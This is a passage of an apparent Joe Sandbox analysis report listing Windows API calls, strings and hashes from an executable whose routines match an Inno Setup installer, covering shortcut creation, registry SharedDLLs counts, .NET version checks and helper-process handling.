                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance$FreeString
                                                                                  • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                  • API String ID: 308859552-2363233914
                                                                                  • Opcode ID: 4019791116f66badce9a962934a38fe6a925263bf281427cd9e28d1a80f6db8e
                                                                                  • Instruction ID: 4df8bc5fd707d325f3bf8ee572e1ec6f0f953e2c79806aa5a0124fc00630fac3
                                                                                  • Opcode Fuzzy Hash: 4019791116f66badce9a962934a38fe6a925263bf281427cd9e28d1a80f6db8e
                                                                                  • Instruction Fuzzy Hash: CBB13170A00108AFDB50DFA9C985B9E7BF8AF49306F554066F804E7362DB78DD48CB69
                                                                                  APIs
                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472EFC
                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473017
                                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047302D
                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00473052
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                  • String ID: .lnk$.pif$.url$Creating the icon.$Desktop.ini$Dest filename: %s$Successfully created the icon.$target.lnk${group}\
                                                                                  • API String ID: 971782779-2902529204
                                                                                  • Opcode ID: c8d3714330c821f44f5f542ed692b99ce225314bcf0a3c632e85185b5bf0d038
                                                                                  • Instruction ID: 2511324a254e809fb6cb6e6df698c04f534d896ef770860fda33365643b674db
                                                                                  • Opcode Fuzzy Hash: c8d3714330c821f44f5f542ed692b99ce225314bcf0a3c632e85185b5bf0d038
                                                                                  • Instruction Fuzzy Hash: 6FD12434A001499FDB01EFA9D582BDDBBF4EF08305F50806AF804B7392D6789E45DB69
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000,?,004991F7,00000000,00499201,?,00000000), ref: 00498B2B
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000,?,004991F7,00000000), ref: 00498B3E
                                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000), ref: 00498B4E
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498B6F
                                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000), ref: 00498B7F
                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,00456126,00000000,0045618E), ref: 0042D491
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                  • API String ID: 2000705611-3672972446
                                                                                  • Opcode ID: 167a4925d39714e1db2cb64cb8e851eafa481197125dc3165488ab0222a1c079
                                                                                  • Instruction ID: c4cf27df87ac7a7b4ea6ef339e5ba87e8767b77ee3c6798ab53da9e3a0f24a8a
                                                                                  • Opcode Fuzzy Hash: 167a4925d39714e1db2cb64cb8e851eafa481197125dc3165488ab0222a1c079
                                                                                  • Instruction Fuzzy Hash: 09919330A042449FDF11EB69D852FAE7BA5EB4A304F51447AF400E72D2CA7CAC05CB6D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,0045AA3C,?,?,?,?,?,00000006,?,00000000,00497F35,?,00000000,00497FD8), ref: 0045A8EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                  • API String ID: 1452528299-3112430753
                                                                                  • Opcode ID: 8a7e70ed7d2802cf2d1f154f993020eede7d014e1a3a8bb25d69fafc5e35e5ca
                                                                                  • Instruction ID: 47b20d326fd82fe6504d69cf898c82eeddf784bf4f3b73b35613650615bf039f
                                                                                  • Opcode Fuzzy Hash: 8a7e70ed7d2802cf2d1f154f993020eede7d014e1a3a8bb25d69fafc5e35e5ca
                                                                                  • Instruction Fuzzy Hash: D171A030B042546BDB00EB6988827AE7BA49F48305F50856BFC01EB383CB7CDE59C75A
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 0045CC82
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CCA2
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CCAF
                                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CCBC
                                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CCCA
                                                                                    • Part of subcall function 0045CB70: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CC0F,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CBE9
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CEBD,?,?,00000000), ref: 0045CD83
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CEBD,?,?,00000000), ref: 0045CD8C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                  • API String ID: 59345061-4263478283
                                                                                  • Opcode ID: c6057923a5b4aa5def86807270a108e59673eb775b044adeceaa0b76775d665d
                                                                                  • Instruction ID: e70f229ab34f11e3bb96b7fa9db8dd957f06ce772e443448e3a5811e0bd6c06d
                                                                                  • Opcode Fuzzy Hash: c6057923a5b4aa5def86807270a108e59673eb775b044adeceaa0b76775d665d
                                                                                  • Instruction Fuzzy Hash: BA5195B1900704EFDB10DF99C881BEEB7B9EB48715F14806AF915F7282C2789945CF69
                                                                                  APIs
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0041B3D3
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0041B3DD
                                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                  • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B406
                                                                                  • GetDC.USER32(00000000), ref: 0041B412
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B43F
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041B465
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                  • String ID:
                                                                                  • API String ID: 644427674-0
                                                                                  • Opcode ID: a07e3cbb24df5042cba66812f0bcbe2bed2d5bf396793bbd6052f972fec3ec6c
                                                                                  • Instruction ID: 6b909a1540c808143a27ece7eebc35972739c5532850bae840edfb4e77f88e68
                                                                                  • Opcode Fuzzy Hash: a07e3cbb24df5042cba66812f0bcbe2bed2d5bf396793bbd6052f972fec3ec6c
                                                                                  • Instruction Fuzzy Hash: 5641CE71E44609AFDB10DAE9C846FEFB7BCEB08704F104466B614F7282C7786D408BA8
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,?,00000000,?,00000000,00454B81,?,0045AC12,00000003,00000000,00000000,00454BB8), ref: 00454A01
                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                  • RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,00000000,?,00000004,00000000,00454ACB,?,0045AC12,00000000,00000000,?,00000000,?,00000000), ref: 00454A85
                                                                                  • RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,00000000,?,00000004,00000000,00454ACB,?,0045AC12,00000000,00000000,?,00000000,?,00000000), ref: 00454AB4
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454958
                                                                                  • , xrefs: 00454972
                                                                                  • RegOpenKeyEx, xrefs: 00454984
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045491F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                  • API String ID: 2812809588-1577016196
                                                                                  • Opcode ID: 395617bcc71a058ce69bc2fb35d8539d5a61a7e9adf83235d3b102da95ca348f
                                                                                  • Instruction ID: f9892de48a8f191bc49ac76cf4be280f3350b447777e8b89a87aacf0c036b8b5
                                                                                  • Opcode Fuzzy Hash: 395617bcc71a058ce69bc2fb35d8539d5a61a7e9adf83235d3b102da95ca348f
                                                                                  • Instruction Fuzzy Hash: 31912571E44208ABDB41DB95C941BDEB7FCEB89309F10447BF900FB282D6789E458B69
                                                                                  APIs
                                                                                    • Part of subcall function 0045940C: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459549,00000000,00459701,?,00000000,00000000,00000000), ref: 00459459
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 004595A7
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 00459611
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 00459678
                                                                                  Strings
                                                                                  • .NET Framework version %s not found, xrefs: 004596B1
                                                                                  • v1.1.4322, xrefs: 0045966A
                                                                                  • .NET Framework not found, xrefs: 004596C5
                                                                                  • v4.0.30319, xrefs: 00459599
                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004595C4
                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 0045955A
                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 0045962B
                                                                                  • v2.0.50727, xrefs: 00459603
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$Open
                                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                  • API String ID: 2976201327-446240816
                                                                                  • Opcode ID: 1c3e49b20786f7f4c067717ed1f3da7ced3b3e07ab1076f2c4b46178acdaa376
                                                                                  • Instruction ID: 13449528a83cd7bd3976393389562d3fcc4363bdf2ba35ed2198dacadad7a936
                                                                                  • Opcode Fuzzy Hash: 1c3e49b20786f7f4c067717ed1f3da7ced3b3e07ab1076f2c4b46178acdaa376
                                                                                  • Instruction Fuzzy Hash: FC51B135A04145EBCB01DF64C8A1BEE77A6DB89305F54447BE8019B393EB3D9E0E8B18
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(?), ref: 00458B23
                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458B3F
                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458B4D
                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00458B5E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458BA5
                                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458BC1
                                                                                  Strings
                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458B8B
                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00458B15
                                                                                  • Helper process exited., xrefs: 00458B6D
                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00458B97
                                                                                  • Helper isn't responding; killing it., xrefs: 00458B2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                  • API String ID: 3355656108-1243109208
                                                                                  • Opcode ID: 580926d47f07d23538b7e0810c5f2f20b36629562999f9b1b12c58acf7172f57
                                                                                  • Instruction ID: 7e49c79e8349cf5087e4bea88bd9331b7e76427b7ebfc1862ecfa5aa0db55867
                                                                                  • Opcode Fuzzy Hash: 580926d47f07d23538b7e0810c5f2f20b36629562999f9b1b12c58acf7172f57
                                                                                  • Instruction Fuzzy Hash: 462162706047409BC760E77DC442B5B76D89F44305F008C2EB999E7283DF7CE8489B6A
                                                                                  APIs
                                                                                    • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00454773,?,00000000,00454837), ref: 004546C3
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00454773,?,00000000,00454837), ref: 004547FF
                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004545DB
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045460B
                                                                                  • RegCreateKeyEx, xrefs: 00454637
                                                                                  • , xrefs: 00454625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                  • API String ID: 2481121983-1280779767
                                                                                  • Opcode ID: 75279f6a64a083a2a8abdb50c603dbef55240c28a0755e1e1ae0767c4fdccaa3
                                                                                  • Instruction ID: dcb2efb4518004930bb79e36ff4c26a26f41c5c3291808b61d16842317edebf7
                                                                                  • Opcode Fuzzy Hash: 75279f6a64a083a2a8abdb50c603dbef55240c28a0755e1e1ae0767c4fdccaa3
                                                                                  • Instruction Fuzzy Hash: E6810175A00209AFDB00EFD5C941BEEB7B9EB49305F50442AF900FB282D7789A45CB69
                                                                                  APIs
                                                                                    • Part of subcall function 00453930: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A1F
                                                                                    • Part of subcall function 00453930: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A2F
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004973A5
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004974F9), ref: 004973C6
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,00497508,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004973ED
                                                                                  • SetWindowLongA.USER32(?,000000FC,00496B80), ref: 00497400
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000,STATIC,00497508), ref: 00497430
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004974A4
                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000), ref: 004974B0
                                                                                    • Part of subcall function 00453DA4: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E8B
                                                                                  • DestroyWindow.USER32(?,004974D3,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000,STATIC), ref: 004974C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                  • API String ID: 1549857992-2312673372
                                                                                  • Opcode ID: 0ab8c79763325155dd79793700a727a6f2b3fb3e9c7f7600a3a4c1d4aca0dfea
                                                                                  • Instruction ID: a44cfd94a4b3d096a525e7606d5a2dde299b278b8d360b581aa2f7a861fbb15f
                                                                                  • Opcode Fuzzy Hash: 0ab8c79763325155dd79793700a727a6f2b3fb3e9c7f7600a3a4c1d4aca0dfea
                                                                                  • Instruction Fuzzy Hash: 1A414370A54208AFDF00EFA5DC52F9E7BB8EB09714F514576F900F7292D6799A00CB68
                                                                                  APIs
                                                                                  • GetActiveWindow.USER32 ref: 00462AA4
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462AB8
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462AC5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462AD2
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00462B1E
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462B5C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
